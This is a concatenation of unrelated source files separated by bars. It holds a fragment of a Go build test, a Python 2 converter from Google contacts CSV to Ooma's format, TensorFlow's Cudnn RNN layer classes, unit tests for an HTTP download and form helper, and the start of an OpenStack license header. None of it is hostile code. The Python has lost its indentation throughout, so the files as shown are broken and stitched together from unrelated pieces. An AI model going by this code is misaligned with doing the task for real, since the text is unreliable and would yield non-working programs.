InvalidFieldException, contains="must point to a `go_first_party_package` target"
):
get_main(Address("explicit_wrong_type"))
|
|
from __future__ import print_function
import sys
import csv
def warning(*objs):
print("WARNING:", *objs, file=sys.stderr)
def error(*objs):
print("ERROR:", *objs, file=sys.stderr)
def fatal(*objs):
print("FATAL:", *objs, file=sys.stderr)
sys.exit(1)
if len(sys.argv) != 3:
sys.exit("Usage: " + sys.argv[0] + " input.csv output.txt")
infile = sys.argv[1]
outfile = sys.argv[2]
# fields in ooma contact export csv file
ofields = [
"Title",
"First Name",
"Middle Name",
"Last Name",
"Suffix",
"Company",
"Department",
"Job",
"Title (duplicate)",
"Business Street",
"Business Street 2",
"Business Street 3",
"Business City",
"Business State",
"Business Postal Code",
"Business Country/Region",
"Home Street",
"Home Street 2",
"Home Street 3",
"Home City",
"Home State",
"Home Postal Code",
"Home Country/Region",
"Other Street",
"Other Street 2",
"Other Street 3",
"Other City",
"Other State",
"Other Postal Code",
"Other Country/Region",
"Assistant's Phone",
"Business Fax",
"Business Phone",
"Business Phone 2",
"Callback",
"Car Phone",
"Company Main Phone",
"Home Fax",
"Home Phone",
"Home Phone 2",
"ISDN",
"Mobile Phone",
"Other Fax",
"Other Phone",
"Pager",
"Primary Phone",
"Radio Phone",
"TTY/TDD Phone",
"Telex",
"Account",
"Anniversary",
"Assistant's Name",
"Billing Information",
"Birthday",
"Business Address PO Box",
"Categories",
"Children",
"Directory Server",
"E-mail Address",
"E-mail Type",
"E-mail Display Name",
"E-mail 2 Address",
"E-mail 2 Type",
"E-mail 2 Display Name",
"E-mail 3 Address",
"E-mail 3 Type",
"E-mail 3 Display Name",
"Gender",
"Government ID Number",
"Hobby",
"Home Address PO Box",
"Initials",
"Internet Free Busy",
"Keywords",
"Language",
"Location",
"Manager's Name",
"Mileage",
"Notes",
"Office Location",
"Organizational ID Number",
"Other Address PO Box",
"Priority",
"Private",
"Profession",
"Referred By",
"Sensitivity",
"Spouse",
"User 1",
"User 2",
"User 3",
"User 4",
"Web Page",
]
omap = {}
# map of field name to index number in output array
for k, v in enumerate(ofields):
omap[v] = k
otitle_index = omap['Title']
ofirst_index = omap['First Name']
olast_index = omap['Last Name']
# map of google field name to ooma output field name
go_map = {
'Name': 'Title',
'Given Name': 'First Name',
'Family Name': 'Last Name',
'Organization 1 - Name': 'Company',
}
# map of google phone type value to ooma output field name
gtype_map = {
'Custom': 'Other Phone',
'Google Voice': 'Other Phone',
'Home Fax': 'Other Fax',
'Home': 'Home Phone',
'Main': "Primary Phone",
'Mobile': 'Mobile Phone',
'Other': 'Other Phone',
'Pager': 'Pager',
'Work Fax': 'Business Fax',
'Work': 'Business Phone',
}
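# Worked example (hypothetical contact): a Google row with
# 'Phone 1 - Type' = 'Mobile' and 'Phone 1 - Value' = '+1 (555) 123-4567'
# ends up in the Ooma 'Mobile Phone' column as '5551234567' after the
# normalization loop below strips the leading '+1', punctuation and spaces.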
out = '"' + '","'.join(ofields) + '"' + "\n"
gmap = {}
header = False
line_no = 0
with open(infile, 'rb') as csvfile:
csvreader = csv.reader(csvfile)
for row in csvreader:
line_no = line_no + 1
if not header:
gfields = row
for k, v in enumerate(gfields):
gmap[v] = k
header = True
continue
output = [''] * len(ofields)
for gname, oname in go_map.items():
if not gmap.has_key(gname):
fatal(infile, ': does not contain field', '"' + gname + '"')
gindex = gmap[gname]
oindex = omap[oname]
output[oindex] = row[gindex]
if output[ofirst_index] == '' and output[olast_index] == '':
if not gmap.has_key('Organization 1 - Name'):
fatal(infile, ': does not contain field "Organization 1 - Name"')
gindex = gmap["Organization 1 - Name"]
company = row[gindex]
if output[otitle_index] == '':
output[otitle_index] = company
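            # No usable first/last name: split the company name into the
            # first and last name fields, packing words into the first name
            # until it would exceed 15 characters.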
parts = company.split(' ')
first = ''
last = ''
for part in parts:
if first > '':
sp = ' '
else:
sp = ''
if len(first) + len(part) + len(sp) <= 15:
first = first + sp + part
else:
if last > '':
sp = ' '
else:
sp = ''
last = last + sp + part
output[ofirst_index] = first
output[olast_index] = last
phones_found = 0
for no in range(1, 20):
gtype_name = 'Phone %d - Type' % (no)
if not gmap.has_key(gtype_name):
break
gvalue_name = 'Phone %d - Value' % (no)
if not gmap.has_key(gvalue_name):
error(infile, ': line', line_no, ': phone', no, ': does not contain field: ', '"' + gvalue_name + '":', output[0])
continue
gtype_index = gmap[gtype_name]
gvalue_index = gmap[gvalue_name]
field = row[gvalue_index].strip()
if field == '':
continue
gtype = row[gtype_index]
if gtype_map.has_key(gtype):
ofield = gtype_map[gtype]
else:
error(infile, ': line', line_no, ': phone', no, ': unknown phone type:', '"' + gtype + '", using "Other Phone":', output[0])
ofield = 'Other Phone'
phones = field.split(':::')
# @todo process other phone numbers?
phone0 = phones[0].strip()
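            # Normalize the number: drop a leading '+1', keep a leading '+'
            # and digits, and skip common punctuation and whitespace.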
new = ''
if phone0[0:2] == '+1':
phone0 = phone0[2:]
for c in phone0:
if len(new) == 0 and c == '+':
new += c
continue
if '0123456789'.find(c) >= 0:
new += c
continue
if "-().".find(c) >= 0:
continue
if " \t".find(c) >= 0:
continue
if len(new) > 10:
                    break
if len(new) == 0:
warning(infile, ': line', line_no, ': phone', no, gtype, ': no phone number found:', output[0])
continue
oindex = omap[ofield]
if phones_found < 4:
output[oindex] = new
else:
error(infile, ': line', line_no, ': phone', no, gtype, new, ': ignoring number, as Ooma has a 4 phone number limit:', output[0])
phones_found += 1
if phones_found == 0:
continue
out += '"' + ('","'.join(output)) + '"' + "\n"
with open(outfile, 'wb') as fp:
fp.write(out)
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Cudnn RNN operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.cudnn_rnn.python.ops import cudnn_rnn_ops
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as base_layer
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.platform import tf_logging as logging
CUDNN_RNN_UNIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_UNIDIRECTION
CUDNN_RNN_BIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_BIDIRECTION
CUDNN_LSTM = cudnn_rnn_ops.CUDNN_LSTM
CUDNN_GRU = cudnn_rnn_ops.CUDNN_GRU
CUDNN_RNN_RELU = cudnn_rnn_ops.CUDNN_RNN_RELU
CUDNN_RNN_TANH = cudnn_rnn_ops.CUDNN_RNN_TANH
# Half for cell input, half for hidden states.
CUDNN_LSTM_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_LSTM_PARAMS_PER_LAYER
CUDNN_GRU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_GRU_PARAMS_PER_LAYER
CUDNN_RNN_TANH_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_TANH_PARAMS_PER_LAYER
CUDNN_RNN_RELU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_RELU_PARAMS_PER_LAYER
CUDNN_INPUT_LINEAR_MODE = cudnn_rnn_ops.CUDNN_INPUT_LINEAR_MODE
CUDNN_INPUT_SKIP_MODE = cudnn_rnn_ops.CUDNN_INPUT_SKIP_MODE
CUDNN_INPUT_AUTO_MODE = cudnn_rnn_ops.CUDNN_INPUT_AUTO_MODE
__all__ = ["CudnnLSTM", "CudnnGRU", "CudnnRNNTanh", "CudnnRNNRelu"]
class _CudnnRNN(base_layer.Layer):
# pylint:disable=line-too-long
"""Abstract class for RNN layers with Cudnn implementation.
Cudnn RNNs have two major differences from other platform-independent RNNs tf
provides:
* Cudnn LSTM and GRU are mathematically different from their tf counterparts.
    (e.g. @{tf.contrib.rnn.LSTMBlockCell} and @{tf.nn.rnn_cell.GRUCell}).
* Cudnn-trained checkpoints are not directly compatible with tf RNNs:
* They use a single opaque parameter buffer for the entire (possibly)
      multi-layer multi-directional RNN, whereas tf RNN weights are per-cell and
layer.
* The size and layout of the parameter buffers may change between
CUDA/CuDNN/GPU generations. Because of that, the opaque parameter variable
does not have a static shape and is not partitionable. Instead of using
partitioning to alleviate the PS's traffic load, try building a
multi-tower model and do gradient aggregation locally within the host
before updating the PS. See https://www.tensorflow.org/performance/performance_models#parameter_server_variables
for a detailed performance guide.
Consequently, if one plans to use Cudnn trained models on both GPU and CPU
for inference and training, one needs to:
* Create a CudnnOpaqueParamsSaveable subclass object to save RNN params in
canonical format. (This is done for you automatically during layer building
process.)
* When not using a Cudnn RNN class, use CudnnCompatibleRNN classes to load the
checkpoints. These classes are platform-independent and perform the same
computation as Cudnn for training and inference.
Similarly, CudnnCompatibleRNN-trained checkpoints can be loaded by CudnnRNN
classes seamlessly.
  Below is a typical workflow (using LSTM as an example):
# Use Cudnn-trained checkpoints with CudnnCompatibleRNNs
```python
with tf.Graph().as_default():
lstm = CudnnLSTM(num_layers, num_units, direction, ...)
outputs, output_states = lstm(inputs, initial_states, training=True)
# If user plans to delay calling the cell with inputs, one can do
# lstm.build(input_shape)
saver = Saver()
# training subgraph
...
# Once in a while save the model.
saver.save(save_path)
# Inference subgraph for unidirectional RNN on, e.g., CPU or mobile.
with tf.Graph().as_default():
single_cell = lambda: tf.contrib.cudnn_rnn.CudnnCompatibleLSTM(num_units)
# NOTE: Even if there's only one layer, the cell needs to be wrapped in
# MultiRNNCell.
cell = tf.nn.rnn_cell.MultiRNNCell(
[single_cell() for _ in range(num_layers)])
# Leave the scope arg unset.
outputs, final_state = tf.nn.dynamic_rnn(cell, inputs, initial_state, ...)
saver = Saver()
# Create session
sess = ...
# Restores
saver.restore(sess, save_path)
# Inference subgraph for bidirectional RNN
with tf.Graph().as_default():
single_cell = lambda: tf.contrib.cudnn_rnn.CudnnCompatibleLSTM(num_units)
cells_fw = [single_cell() for _ in range(num_layers)]
cells_bw = [single_cell() for _ in range(num_layers)]
# Leave the scope arg unset.
(outputs, output_state_fw,
output_state_bw) = tf.contrib.rnn.stack_bidirectional_dynamic_rnn(
cells_fw, cells_bw, inputs, ...)
saver = Saver()
# Create session
sess = ...
# Restores
saver.restore(sess, save_path)
```
"""
# pylint:enable=line-too-long
# TODO(allenl): Document object-based saving and checkpoint compatibility once
# it's implemented for more cuDNN Layers.
# The following are constants defined by subclasses.
# Type of RNN cell.
_rnn_mode = None
# Number of cell weights(or biases) per layer.
_num_params_per_layer = None
# Custom SaveableObject class for the CudnnRNN class.
_saveable_cls = None
def __init__(self,
num_layers,
num_units,
input_mode=CUDNN_INPUT_LINEAR_MODE,
direction=CUDNN_RNN_UNIDIRECTION,
dropout=0.,
seed=None,
dtype=dtypes.float32,
kernel_initializer=None,
bias_initializer=None,
name=None):
"""Creates a CudnnRNN model from model spec.
Args:
num_layers: the number of layers for the RNN model.
num_units: the number of units within the RNN model.
input_mode: indicate whether there is a linear projection between the
input and the actual computation before the first layer. It can be
'linear_input', 'skip_input' or 'auto_select'.
'linear_input' (default) always applies a linear projection of input
onto RNN hidden state. (standard RNN behavior).
'skip_input' is only allowed when input_size == num_units;
'auto_select' implies 'skip_input' when input_size == num_units;
otherwise, it implies 'linear_input'.
direction: the direction model that the model operates. Can be either
'unidirectional' or 'bidirectional'
dropout: dropout rate, a number between [0, 1]. Dropout is applied between
each layer (no dropout is applied for a model with a single layer).
When set to 0, dropout is disabled.
seed: the op seed used for initializing dropout. See @{tf.set_random_seed}
for behavior.
dtype: tf.float16, tf.float32 or tf.float64
kernel_initializer: starting value to initialize the weight.
bias_initializer: starting value to initialize the bias
(default is all zeros).
name: VariableScope for the created subgraph; defaults to class name.
This only serves the default scope if later no scope is specified when
invoking __call__().
Raises:
ValueError: if direction is invalid. Or dtype is not supported.
"""
super(_CudnnRNN, self).__init__(dtype=dtype, name=name)
cudnn_rnn_ops.check_direction(direction)
cudnn_rnn_ops.check_input_mode(input_mode)
if dtype not in [dtypes.float16, dtypes.float32, dtypes.float64]:
raise ValueError(
"Only support float16, float32, float64, provided %s" % dtype)
# Layer self.dtype is type name, the original DType object is kept here.
self._plain_dtype = dtype
self._num_layers = num_layers
self._num_units = num_units
self._input_mode = input_mode
self._direction = direction
self._dropout = dropout
self._seed = seed
self._kernel_initializer = kernel_initializer
self._bias_initializer = bias_initializer
# Init input_size to None, which will be set after build().
self._input_size = None
self._saveable = None
@property
def num_layers(self):
return self._num_layers
@property
def num_units(self):
return self._num_units
@property
def input_mode(self):
"""Input mode of first layer.
Indicates whether there is a linear projection between the input and the
actual computation before the first layer. It can be
* 'linear_input': (default) always applies a linear projection of input
onto RNN hidden state. (standard RNN behavior)
* 'skip_input': 'skip_input' is only allowed when input_size == num_units.
    * 'auto_select': implies 'skip_input' when input_size == num_units;
otherwise, it implies 'linear_input'.
Returns:
'linear_input', 'skip_input' or 'auto_select'.
"""
return self._input_mode
@property
def input_size(self):
if not self._input_size:
raise ValueError(
"\'input_size\' is unknown since layer has not been built.")
return self._input_size
@property
def rnn_mode(self):
"""Type of RNN cell used.
Returns:
`lstm`, `gru`, `rnn_relu` or `rnn_tanh`.
"""
return self._rnn_mode
@property
def direction(self):
"""Returns `unidirectional` or `bidirectional`."""
return self._direction
@property
def num_dirs(self):
return 1 if self._direction == CUDNN_RNN_UNIDIRECTION else 2
@property
def saveable(self):
return self._saveable
@property
def canonical_weight_shapes(self):
"""Shapes of Cudnn canonical weight tensors."""
if not self._input_size:
raise RuntimeError(
"%s.canonical_weight_shapes invoked before input shape is known" %
type(self).__name__)
shapes = []
for i in range(self._num_layers):
shapes.extend(self._canonical_weight_shape(i))
return shapes
@property
def canonical_bias_shapes(self):
"""Shapes of Cudnn canonical bias tensors."""
return self._canonical_bias_shape(0) * self._num_layers
def _update_trainable_weights(self, getter, *args, **kwargs):
"""Custom getter for layer variables."""
# Add variables to layer's `(non_)trainable_weights` list(s).
variable = getter(*args, **kwargs)
trainable = kwargs.get("trainable", True)
if trainable and variable not in self._trainable_weights:
self._trainable_weights.append(variable)
elif not trainable and variable not in self._non_trainable_weights:
self._non_trainable_weights.append(variable)
return variable
def build(self, input_shape):
"""Create variables of the Cudnn RNN.
It can be called manually before `__call__()` or automatically through
`__call__()`. In the former case, subsequent `__call__()`s will skip
creating variables.
Args:
input_shape: network input tensor shape, a python list or a TensorShape
object with 3 dimensions.
Raises:
ValueError: if input_shape has wrong dimension or unknown 3rd dimension.
"""
if self.built:
return
input_shape = tensor_shape.TensorShape(input_shape)
if input_shape.ndims != 3:
raise ValueError("Expecting input_shape with 3 dims, got %d" %
input_shape.ndims)
if input_shape[-1].value is None:
raise ValueError("The last dimension of the inputs to `CudnnRNN` "
"should be defined. Found `None`.")
self._input_size = input_shape[-1].value
self.input_spec = base_layer.InputSpec(ndim=3, axes={-1: self._input_size})
self._set_scope(None)
    # Not using the base class `add_variable()` since it calls
    # `tf.get_variable()` with a callable initializer, whereas here the
    # initializer is a tensor. The difference is needed to support
    # forward-compatibility with Cudnn.
with vs.variable_scope(
self._scope,
reuse=self.built,
custom_getter=self._update_trainable_weights):
if self._kernel_initializer is None:
self._kernel_initializer = init_ops.glorot_uniform_initializer(
seed=self._seed, dtype=self._plain_dtype)
if self._bias_initializer is None:
self._bias_initializer = init_ops.constant_initializer(
0.0, dtype=self._plain_dtype)
weights = [
self._kernel_initializer(sp, dtype=self._plain_dtype)
for sp in self.canonical_weight_shapes
]
biases = [
self._bias_initializer(sp, dtype=self._plain_dtype)
for sp in self.canonical_bias_shapes
]
opaque_params_t = self._canonical_to_opaque(weights, biases)
if vs.get_variable_scope().partitioner is not None:
logging.warn(
"Partitioner is not supported for Cudnn RNN layer variables, using "
"it will create forward-compatibility issues with future "
"CUDA/CuDNN generations.")
# Initialize opaque params with a tensor.
self.kernel = vs.get_variable(
"opaque_kernel", initializer=opaque_params_t, validate_shape=False)
# Create saveable in the outer scope of the cudnn subgraph, such that
# alternative subgraph with platform-independent rnn cells can load the
# checkpoints directly.
if not (self.built or vs.get_variable_scope().reuse is True):
self._create_saveable()
self.built = True
def _gather_saveables_for_checkpoint(self):
raise NotImplementedError(
"This cell does not yet support object-based saving. File a feature "
"request if this limitation bothers you.")
def call(self, inputs, initial_state=None, training=True):
"""Runs the forward step for the RNN model.
Args:
inputs: `3-D` tensor with shape `[time_len, batch_size, input_size]`.
initial_state: a tuple of tensor(s) of shape
`[num_layers * num_dirs, batch_size, num_units]`. If not provided, use
zero initial states. The tuple size is 2 for LSTM and 1 for other RNNs.
training: whether this operation will be used in training or inference.
Returns:
output: a tensor of shape `[time_len, batch_size, num_dirs * num_units]`.
It is a `concat([fwd_output, bak_output], axis=2)`.
output_states: a tuple of tensor(s) of the same shape and structure as
`initial_state`.
Raises:
ValueError: initial_state is not a tuple.
"""
if initial_state is not None and not isinstance(initial_state, tuple):
raise ValueError("Invalid initial_state type: %s, expecting tuple.",
type(initial_state))
dtype = self.dtype
inputs = ops.convert_to_tensor(inputs, dtype=dtype)
batch_size = array_ops.shape(inputs)[1]
if initial_state is None:
initial_state = self._zero_state(batch_size)
if self._rnn_mode == CUDNN_LSTM:
h, c = initial_state # pylint:disable=unbalanced-tuple-unpacking,unpacking-non-sequence
else:
h, = initial_state # pylint:disable=unbalanced-tuple-unpacking,unpacking-non-sequence
h = ops.convert_to_tensor(h, dtype=dtype)
if self._rnn_mode == CUDNN_LSTM:
c = ops.convert_to_tensor(c, dtype=dtype)
else:
# For model that doesn't take input_c, replace with a dummy tensor.
c = array_ops.constant([], dtype=dtype)
outputs, (output_h, output_c) = self._forward(inputs, h, c, self.kernel,
training)
if self._rnn_mode == CUDNN_LSTM:
return outputs, (output_h, output_c)
else:
return outputs, (output_h,)
def state_shape(self, batch_size):
raise NotImplementedError
def _zero_state(self, batch_size):
res = []
for sp in self.state_shape(batch_size):
res.append(array_ops.zeros(sp, dtype=self.dtype))
return tuple(res)
def _canonical_weight_shape(self, layer):
"""Shapes of Cudnn canonical weight tensors for given layer."""
if layer < 0 or layer >= self._num_layers:
raise ValueError("\'layer\' is not valid, got %s, expecting [%d, %d]" %
(layer, 0, self._num_layers-1))
if not self._input_size:
raise RuntimeError(
"%s._canonical_weight_shape invoked before input shape is known" %
type(self).__name__)
input_size = self._input_size
num_units = self._num_units
num_gates = self._num_params_per_layer // 2
is_bidi = self._direction == CUDNN_RNN_BIDIRECTION
if layer == 0:
wts_applied_on_inputs = [(num_units, input_size)] * num_gates
else:
if is_bidi:
wts_applied_on_inputs = [(num_units, 2 * num_units)] * num_gates
else:
wts_applied_on_inputs = [(num_units, num_units)] * num_gates
wts_applied_on_hidden_states = [(num_units, num_units)] * num_gates
tf_wts = wts_applied_on_inputs + wts_applied_on_hidden_states
return tf_wts if not is_bidi else tf_wts * 2
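  # Illustrative example (derived from the shapes above): for a unidirectional
  # CudnnLSTM (4 gates), layer 0 yields four (num_units, input_size) input
  # weight matrices plus four (num_units, num_units) recurrent weight matrices;
  # bidirectional layers double the list.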
def _canonical_bias_shape(self, unused_layer):
"""Shapes of Cudnn canonical bias tensors for given layer."""
num_dirs = 1 if self._direction == CUDNN_RNN_UNIDIRECTION else 2
return [[self._num_units]] * num_dirs * self._num_params_per_layer
def _canonical_to_opaque(self, cu_weights, cu_biases):
if not self._input_size:
raise RuntimeError(
"%s._canonical_to_opaque invoked before input shape is known" %
type(self).__name__)
with ops.device("/gpu:0"):
return cudnn_rnn_ops.cudnn_rnn_canonical_to_opaque_params(
rnn_mode=self._rnn_mode,
num_layers=self._num_layers,
num_units=self._num_units,
input_size=self._input_size,
weights=cu_weights,
biases=cu_biases,
input_mode=self._input_mode,
seed=self._seed,
dropout=self._dropout,
direction=self._direction)
def _forward(self, inputs, h, c, opaque_params, training):
output, output_h, output_c = cudnn_rnn_ops._cudnn_rnn( # pylint:disable=protected-access
inputs,
h,
c,
opaque_params,
training,
self._rnn_mode,
input_mode=self._input_mode,
direction=self._direction,
dropout=self._dropout,
seed=self._seed)
return output, (output_h, output_c)
def _create_saveable(self):
"""Create custom saveable for the Cudnn layer.
Called during layer building process to make sharing checkpoints between
Cudnn and Cudnn-compatible RNNs easy.
Returns:
a `CudnnOpaqueParamsSaveable` object.
Raises:
RuntimeError: if any custom saveable is already created for this layer.
"""
if self._saveable is not None:
raise RuntimeError("Cudnn saveable already created.")
self._saveable = self._saveable_cls( # pylint:disable=not-callable
opaque_params=self.trainable_variables[0],
num_layers=self.num_layers,
num_units=self.num_units,
input_size=self.input_size,
input_mode=self.input_mode,
direction=self.direction,
scope=vs.get_variable_scope(),
name="%s_saveable" % self.trainable_variables[0].name.split(":")[0])
self._saveable._add_checkpointable_dependencies( # pylint: disable=protected-access
checkpointable=self, dtype=self._plain_dtype)
ops.add_to_collection(ops.GraphKeys.SAVEABLE_OBJECTS, self._saveable)
class CudnnLSTM(_CudnnRNN):
"""Cudnn implementation of LSTM layer."""
_rnn_mode = CUDNN_LSTM
_num_params_per_layer = CUDNN_LSTM_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnLSTMSaveable
def state_shape(self, batch_size):
"""Shape of Cudnn LSTM states.
Shape is a 2-element tuple. Each is
[num_layers * num_dirs, batch_size, num_units]
Args:
batch_size: an int
Returns:
a tuple of python arrays.
"""
return ([self.num_layers * self.num_dirs, batch_size, self.num_units],
[self.num_layers * self.num_dirs, batch_size, self.num_units])
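  # Example (derived from state_shape above): a 2-layer unidirectional
  # CudnnLSTM with num_units=128 returns
  # ([2, batch_size, 128], [2, batch_size, 128]), i.e. one entry for h and one
  # for c.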
@property
def _gather_saveables_for_checkpoint(self):
if self._direction == CUDNN_RNN_UNIDIRECTION:
# Skip one inheritance level to avoid NotImplementedError.
return super(_CudnnRNN, self)._gather_saveables_for_checkpoint
else:
raise NotImplementedError(
"Object-based saving does not currently support bidirectional LSTM "
"cells. File a feature request if this limitation bothers you.")
class _CudnnRNNNoInputC(_CudnnRNN):
"""Abstract simple CudnnRNN layer without input_c."""
def state_shape(self, batch_size):
"""Shape of the state of Cudnn RNN cells w/o. input_c.
Shape is a 1-element tuple,
[num_layers * num_dirs, batch_size, num_units]
Args:
batch_size: an int
Returns:
a tuple of python arrays.
"""
return [self.num_layers * self.num_dirs, batch_size, self.num_units],
class CudnnGRU(_CudnnRNNNoInputC):
"""Cudnn implementation of the GRU layer."""
_rnn_mode = CUDNN_GRU
_num_params_per_layer = CUDNN_GRU_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnGRUSaveable
class CudnnRNNTanh(_CudnnRNNNoInputC):
"""Cudnn implementation of the RNN-tanh layer."""
_rnn_mode = CUDNN_RNN_TANH
_num_params_per_layer = CUDNN_RNN_TANH_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnRNNTanhSaveable
class CudnnRNNRelu(_CudnnRNNNoInputC):
"""Cudnn implementation of the RNN-relu layer."""
_rnn_mode = CUDNN_RNN_RELU
_num_params_per_layer = CUDNN_RNN_RELU_PARAMS_PER_LAYER
_saveable_cls = cudnn_rnn_ops.CudnnRNNReluSaveable
|
|
import unittest
from tests.availability import lxml_available, requests_available
import contextlib
import filecmp
import pathlib
import socketserver
import sys
import tempfile
from concurrent import futures
if requests_available:
from garage.http import clients
from garage.http import utils
from tests.http.mocks import *
from tests.http.server import *
@unittest.skipUnless(requests_available, 'requests unavailable')
class DownloadTest(unittest.TestCase):
data_dirpath = pathlib.Path(__file__).with_name('data')
if not data_dirpath.is_absolute():
data_dirpath = pathlib.Path.cwd() / data_dirpath
def setUp(self):
# XXX: Work around TIME_WAIT state of connected sockets.
socketserver.TCPServer.allow_reuse_address = True
def tearDown(self):
socketserver.TCPServer.allow_reuse_address = False
def prepare(self, stack):
stack.enter_context(suppress_stderr())
stack.enter_context(change_dir(self.data_dirpath))
stack.enter_context(start_server())
self.executor = stack.enter_context(futures.ThreadPoolExecutor(1))
self.root_dirpath = pathlib.Path(
stack.enter_context(tempfile.TemporaryDirectory()))
print('data_dirpath', self.data_dirpath, file=sys.stderr)
print('root_dirpath', self.root_dirpath, file=sys.stderr)
def test_download(self):
relpath_to_requests = {
'file1': [
'http://localhost:8000/file1-not',
'http://localhost:8000/file1-still-not',
'http://localhost:8000/file1',
'http://localhost:8000/file1-also-not',
],
'path/to/file2-alias': [
'http://localhost:8000/file2',
],
}
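        # Each relpath maps to a list of candidate URLs; only .../file1 and
        # .../file2 exist on the test server, so download() is expected to
        # fall back past the failing URLs and still produce both files.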
with contextlib.ExitStack() as stack:
self.prepare(stack)
utils.download(
client=clients.Client(),
executor=self.executor,
output_dirpath=(self.root_dirpath / 'test'),
relpath_to_requests=relpath_to_requests,
)
self.assertTrue(self.root_dirpath.is_dir())
self.assertFileEqual(
self.data_dirpath / 'file1',
self.root_dirpath / 'test' / 'file1',
)
self.assertFileEqual(
self.data_dirpath / 'file2',
self.root_dirpath / 'test' / 'path/to/file2-alias',
)
paths = [
str(path.relative_to(self.root_dirpath))
for path in sorted(self.root_dirpath.glob('**/*'))
]
self.assertListEqual(
[
'test',
'test/file1',
'test/path',
'test/path/to',
'test/path/to/file2-alias',
],
paths,
)
def test_downloader(self):
"""Test each step that download() takes."""
relpath_to_requests = {
'file1': ['http://localhost:8000/file1'],
'file2': ['http://localhost:8000/file2'],
}
with contextlib.ExitStack() as stack:
self.prepare(stack)
client = clients.Client()
output_dirpath = self.root_dirpath / 'test'
dler = utils._Downloader(
client=client,
executor=self.executor,
output_dirpath=output_dirpath,
relpath_to_requests=relpath_to_requests,
strict=True,
chunk_size=10240)
### Test _Downloader.prepare()
# prepare() skips existing dir.
output_dirpath.mkdir(parents=True)
self.assertFalse(dler.prepare())
output_dirpath.rmdir()
# prepare() errs on non-dir.
output_dirpath.touch()
with self.assertRaises(utils.DownloadError):
dler.prepare()
output_dirpath.unlink()
            # prepare() errs when the temp ('.part') path exists as a non-dir.
tmp_dirpath = output_dirpath.with_name(
output_dirpath.name + '.part')
tmp_dirpath.touch()
with self.assertRaises(utils.DownloadError):
dler.prepare()
tmp_dirpath.unlink()
self.assertTrue(dler.prepare())
### Test _Downloader.download()
# download() skips existing file.
file1_path = tmp_dirpath / 'file1'
file1_path.touch()
dler.download(tmp_dirpath)
with file1_path.open() as file1:
self.assertEqual('', file1.read())
self.assertFileNotEqual(
self.data_dirpath / 'file1',
tmp_dirpath / 'file1',
)
self.assertFileEqual(
self.data_dirpath / 'file2',
tmp_dirpath / 'file2',
)
### Test _Downloader.check()
file3_path = tmp_dirpath / 'path/to/file3'
file3_path.parent.mkdir(parents=True)
file3_path.touch()
dler.strict = False
dler.check(tmp_dirpath)
self.assertTrue(file3_path.exists())
self.assertTrue(file3_path.parent.exists())
self.assertTrue(file3_path.parent.parent.exists())
# check() removes extra files when strict is True.
dler.strict = True
dler.check(tmp_dirpath)
self.assertFalse(file3_path.exists())
self.assertFalse(file3_path.parent.exists())
self.assertFalse(file3_path.parent.parent.exists())
paths = [
str(path.relative_to(self.root_dirpath))
for path in sorted(self.root_dirpath.glob('**/*'))
]
self.assertListEqual(
['test.part', 'test.part/file1', 'test.part/file2'], paths
)
# check() errs on missing files.
file1_path.unlink()
with self.assertRaises(utils.DownloadError):
dler.check(tmp_dirpath)
def assertFileEqual(self, expect, actual):
self.assertTrue(self.compare_file(expect, actual))
def assertFileNotEqual(self, expect, actual):
self.assertFalse(self.compare_file(expect, actual))
def compare_file(self, expect, actual):
expect = pathlib.Path(expect)
actual = pathlib.Path(actual)
self.assertTrue(expect.is_file())
self.assertTrue(actual.is_file())
return filecmp.cmp(str(expect), str(actual), shallow=False)
@unittest.skipUnless(requests_available, 'requests unavailable')
class FormTest(unittest.TestCase):
@unittest.skipUnless(lxml_available, 'lxml unavailable')
def test_form(self):
req_to_rep = {
('GET', 'http://uri_1/'): (
200, b'<form action="http://uri_1"></form>'
),
('POST', 'http://uri_1/'): (200, 'hello world'),
('GET', 'http://uri_2/'): (200, b'<form></form><form></form>'),
('GET', 'http://uri_3/'): (
200, b'''<form action="http://uri_3">
<input name="k1" value="v1"/>
<input name="k2" value="other_v2"/>
</form>
'''
),
('POST', 'http://uri_3/'): (200, 'form filled'),
}
session = MockSession(req_to_rep)
client = clients.Client(_session=session, _sleep=fake_sleep)
rep = utils.form(client, 'http://uri_1')
self.assertEqual('hello world', rep.content)
with self.assertRaisesRegex(ValueError, 'require one form'):
rep = utils.form(client, 'http://uri_2')
session._logs.clear()
rep = utils.form(client, 'http://uri_3', form_data={'k2': 'v2'})
self.assertEqual('form filled', rep.content)
self.assertEqual(2, len(session._logs))
self.assertEqual('GET', session._logs[0].method)
self.assertEqual('http://uri_3/', session._logs[0].url)
self.assertEqual('POST', session._logs[1].method)
self.assertEqual('http://uri_3/', session._logs[1].url)
self.assertListEqual(
['k1=v1', 'k2=v2'], sorted(session._logs[1].body.split('&')))
if __name__ == '__main__':
unittest.main()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
